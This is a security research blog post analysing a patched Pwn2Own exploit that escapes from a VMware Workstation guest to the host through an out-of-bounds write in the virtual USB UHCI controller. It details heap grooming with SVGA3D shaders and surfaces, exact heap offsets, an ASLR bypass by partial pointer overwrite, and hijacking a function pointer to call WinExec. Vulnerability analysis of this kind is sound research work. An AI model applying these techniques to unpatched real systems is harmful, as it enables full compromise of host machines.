Taking Control of VMware Through the Universal Host Control Interface: Part 2

August 15, 2019 | Guest Blogger

This blog looking at a winning Pwn2Own entry was provided by Abdulellah Alsaheel, our summer intern from Purdue University. This is the second blog reviewing this Pwn2Own winning exploit. You can read the first part of this series here.


During this year’s Pwn2Own competition in Vancouver, the Fluoroacetate team demonstrated how they could escalate privileges by exploiting VMware Workstation to escape from the guest OS to the host OS. They exploited an out-of-bounds read/write vulnerability (ZDI-19-421) in the virtual USB 1.1 UHCI (Universal Host Controller Interface).

While this vulnerability affected a wide variety of VMware products, the analysis throughout this blog is based on VMware Workstation 15.0.3 using Fluoroacetate’s exploit. The vulnerability was patched in VMware Workstation 15.0.4 with VMSA-2019-0005.1.

The Vulnerability

To allow VMware guest machines to access USB devices, VMware installs a kernel device driver named uhci_hcd in the guest. “hcd” stands for “Host Controller Driver”. This driver allows the guest to communicate with the Host Controller Interface (HCI) at the host side, which is the hardware interface used by the host to communicate with the physical USB port. Communication is accomplished by sending or receiving USB Request Block (URB) packets to or from various endpoints defined by the USB device. Each endpoint of the USB device is intended either to receive packets from the host (OUT), or to send packets to the host (IN). The vulnerability is triggered by sending a specially crafted OUT packet to a certain endpoint known as the Bulk endpoint.

Packets handled by the uhci_hcd driver are represented in memory by the uhci_td (Transfer Descriptor) structure:

Transfer Descriptor (TD) structure

Note that the token field contains certain bit-aligned subfields not visible here. In particular, the lowest 8 bits indicate the “Packet ID”, which defines the type of packet. The top 10 bits is a length field named MaxLen.

In order to trigger this vulnerability, the guest must send a crafted TD structure that sets the Packet ID as OUT (0xE1). Additionally, the TD’s buffer length, indicated by the MaxLen subfield, has to be more than 0x40 bytes to overflow an object on the heap. By attaching windbg to vmware-vmx.exe and triggering the vulnerability, we get the following access violation:

The call stack reveals a chain of functions that handle UHCI requests:

The memcpy call that crashes the process was in the middle of copying data from the TD’s buffer:

And this is what memcpy has copied from the TD’s buffer to the heap:

Let’s see what the destination buffer size is:

The size of the buffer is 0x58 because vmware-vmx allocates the destination buffer with the size [number_of_TD_structures]*0x40+0x18. Since this time we only sent one TD structure, the buffer size is 1*0x40+0x18=0x58 bytes.

In this memcpy call, we could precisely determine how many bytes we want to copy. To do this, we set MaxLen subfield in the OUT TD’s token field (bits 21 through 31) to the desired memcpy size minus one.

Clearly, with this we are able to overflow the heap. However, in addition to overflowing the heap, the exploit author was able to exploit this vulnerability to perform additional out-of-bounds writes. The function NewURB() (located at vmware_vmx+0x165710) gets called to handle incoming URB packets. Each time the function NewURB() receives a TD, it adds the TD’s MaxLen value to a variable known as cursor. The cursor variable points to where the function should write next when it receives a TD structure. In this way, the MaxLen field can be used to partially control the destination address when processing subsequent TDs.

The Exploit

In order to exploit this vulnerability, it’s necessary to prepare the layout of the heap of the vmware-vmx process. To perform the heap preparation tasks, the exploit mainly relies on the SVGA3D protocol on the front end (the guest side), which it uses to communicate to the host through SVGA FIFO. On the back-end (the host side), VMware handles the requests using the DX11Renderer component. The exploit code starts with the initialization phase, where it initializes SVGA FIFO memory, then allocates the SVGA3D object tables. It looks like Amat based the exploit primitives used here on research presented by Zisis Sialveras at Black Hat Europe 2018 [PDF].

The overall strategy for preparing the heap will be as follows. The exploit will try to create “holes”, or islands of unallocated memory, each having size 0x158 bytes. That is exactly the required size for allocating a certain number of TDs together with a buffer header. The TDs will likely be allocated within one of these holes. Following each hole, the exploit tries to place a 0x150 byte structure called a “resource container”, representing data associated with a graphics surface. The plan is to corrupt the resource container that immediately follows the allocated TDs.

The exploit code prepares the heap using the following steps:
    -- Define and bind a Context memory object with a size of 0x5000.
    -- Define a memory object (SPRAY_OBJ) with the size 0x1000, that the exploit repeatedly uses to bind with structures (e.g., shaders).
    -- Define 2400 shaders with the size 0x158, binding them to SPRAY_OBJ. After that, the exploit uses SVGA_3D_CMD_SET_SHADER to spray the shaders in the host.
    -- Iterate through the sprayed shaders and perform the following:
        --- Deallocate each even-numbered shader.
        --- Create a surface, to allocate a resource container having a size of 0x150. This allocation will usually be made in the hole that was just vacated by a shader. Additionally, the host will allocate an associated data buffer of size 0x160. Because of the difference in size, these data buffers will be located in a separate area of the Low-Fragmentation Heap (LFH). Each 0x150-byte resource container will contain a pointer to its associated 0x160-byte data buffer.
        --- Create two more surfaces, to allocate two other resource containers having a size of 0x160. Because of their size, the resource containers allocated in this step will be located in memory near the 0x160-byte data buffers of the previous step. For this reason, these resource containers are known as the “adjacent” resource containers. The purpose of these “adjacent” resource containers will be explained below.
    -- Deallocate all remaining shaders, to free blocks of size 0x158. These holes of size 0x158 will alternate with the resource containers of size 0x150.

Out-of-Bound Write Function

Before we highlight the general structure of the exploit, let’s describe the function WriteOOB that triggers the vulnerability. WriteOOB is called many times throughout the exploit for different purposes, such as leaking the vmware-vmx.exe and kernel32.dll base addresses, as well as the final code execution step. The function’s parameters are as follows:

WriteOOB()(void * data, size_t data_size, uint32_t offset)

The data parameter is a pointer to a buffer containing data we intend to write to the host heap. The size parameter specifies the length of the data. Finally, the offset parameter specifies the location where want to write the data, relative to the start of the resource container that will be corrupted.

The function first allocates and initializes the frame list and five TD structures. Recall that during heap massaging, we create holes of size 0x158. This function sends five TD structures, so the allocated buffer size on the heap will be 5*0x40+0x18=0x158. The hope is that this allocation will be made in the hole, so that immediately following the TDs there will be a resource container to corrupt.

Each TD structure is linked to the next TD structure using the link field, except for the last TD structure, which is a terminating TD structure. For the first three TD structures, the MaxLen subfield is set to 0x40. The Packet ID subfield for the first three TD structures is set to USB_PID_SOF, so that the cursor will advance by 0x41 for each TD structure. The Packet ID for the fourth TD structure is also set to USB_PID_SOF, but for this TD, MaxLen is set to a value calculated from the offset parameter. This advances the cursor by a controllable amount. In the fifth TD, the Packet ID is set to USB_PID_OUT, in order to write the content of the data buffer to the cursor position.

Memory leak and bypassing ASLR

Now that the exploit primitives are all in place, the first order of business is to leak the base address of vmware-vmx.exe. This is done by corrupting the pointer to the data buffer in the resource container immediately following the TDs. This pointer resides at offset 0x138 within the resource container. The exploit corrupts the least significant byte of the data pointer by replacing it with 0x00. When the corrupted pointer gets referenced, it no longer points to the data buffer. Instead, it points within one of the 0x160-byte “adjacent” resource containers that are located close to the data buffers. Within these resource containers there are some function pointers, so when the data is copied back to the guest, the vmware-vmx.exe base address is revealed:

Let’s see how many bytes we need to move the cursor in order to patch the data pointer precisely:

·       Initially, the cursor points to the beginning of a buffer with size 0x158, and considering that the first 0x18 bytes are reserved as a buffer header, we only have control over 0x140 bytes.
·       0x8 bytes are taken up by the heap block header of the following resource container.
·       The offset to the data pointer in the resource container is 0x138.

This sums to 0x140+0x8+0x138=0x280, and this is the number bytes the cursor has to move to point to the byte we intend to patch.

In order to write back the leaked function pointers to the guest, the exploit iterates over the 2400 sprayed surfaces and obtains the data from each one using SVGA_3D_CMD_SURFACE_COPY. It continues iterating until it finds the leaked function pointers that reveal the vmware-vmx.exe base address.

To find the kernel32.dll base address, the exploit follows the same process and offsets used to find vmware-vmx.exe, except for one minor detail. Instead of patching a single byte of the pointer, it overwrites the entire data pointer with vmware_vmx_base_address+0x7D42D8, which is where the address of Kernel32!MultiByteToWideCharStub is stored in the import address table. This reveals the kernel32.dll base address.

Escape and Code Execution on the Host

To achieve code execution, the exploit once again overwrites a resource container on the heap. This time, the exploit overwrites 0x120 bytes of the resource container. This accomplishes three things:

      1 - It writes the string calc.exe to the resource container.
      2 - It fills out certain necessary fields of the resource container.
      3 - It overwrites a function pointer at offset 0x120 in the resource container, so that it instead points to kernel32!WinExec.

This is what the corrupted resource container looks like after corruption:

The result is that when the guest calls SVGA_3D_CMD_SURFACE_COPY on this corrupted resource container, the WinExec function pointer will get called, passing the address of the calc.exe string as the first parameter. The exploit must iterate through all 2400 surfaces to ensure that the corrupted resource container is used.

Summary of the exploit

To review the above material, we can summarize the exploit as follows:

    -- Heap massaging:
        --- Allocate 2400 shaders of size 0x158.
        --- Deallocate alternate shaders of size 0x158.
        --- For each deallocated shader, fill the hole with a resource container (e.g., surface) of size 0x150. Within this resource container there will be a pointer to an associated data buffer of size 0x160. Also create two more shaders, allocating two resource containers of size 0x160 that will be adjacent to the data buffers.
    -- Leaking vmware-vmx.exe base address (iterate 64 times until the address is found):
        --- Call WriteOOB to corrupt a resource container of size 0x150 and patch the least significant byte of the pointer to its data buffer, so that it instead points to an adjacent 0x160-byte resource container. This memory contains some function pointers.
        --- Iterate through the 2400 surfaces and write the data back to the guest using SVGA_3D_CMD_SURFACE_COPY until leaked pointers are found.
    -- Leaking kernel32.dll base address (iterate 64 times until the address is found):
        --- Call WriteOOB to corrupt a resource container of size 0x150 and patch the pointer to its data buffer with the address of a kernel32.dll function in the import table of vmware-vmx.exe.
        --- Iterate through the 2400 surfaces and write the data back to the guest using SVGA_3D_CMD_SURFACE_COPY until the leaked pointer is found.
    -- Escape from the guest and gain code execution (iterate 64 times, until we have execution):
        --- Call WriteOOB to corrupt a resource container of size 0x150. Write the “calc.exe” string and patch a function pointer with the address of kernel32!WinExec.
        --- Trigger WinExec by Iterating through the 2400 surfaces and writing them back to the guest using SVGA_3D_CMD_SURFACE_COPY.

Conclusion

VMware guest-to-host escapes can be performed reliably for certain memory corruption bugs. An exploit can gain code execution by adopting a semi-brute force style. It is still a challenge to find exploitable bugs in VMware, but once a vulnerability is found, it is not overly difficult to exploit. VMware SVGA provides a wide variety of operations and objects, such as resource containers and shaders. These are useful from an exploit perspective in terms of their adjustable size, and the data and function pointers they store.

You can find me on Twitter at @0xAlsaheel and follow the ZDI team for the latest in exploit techniques and security patches.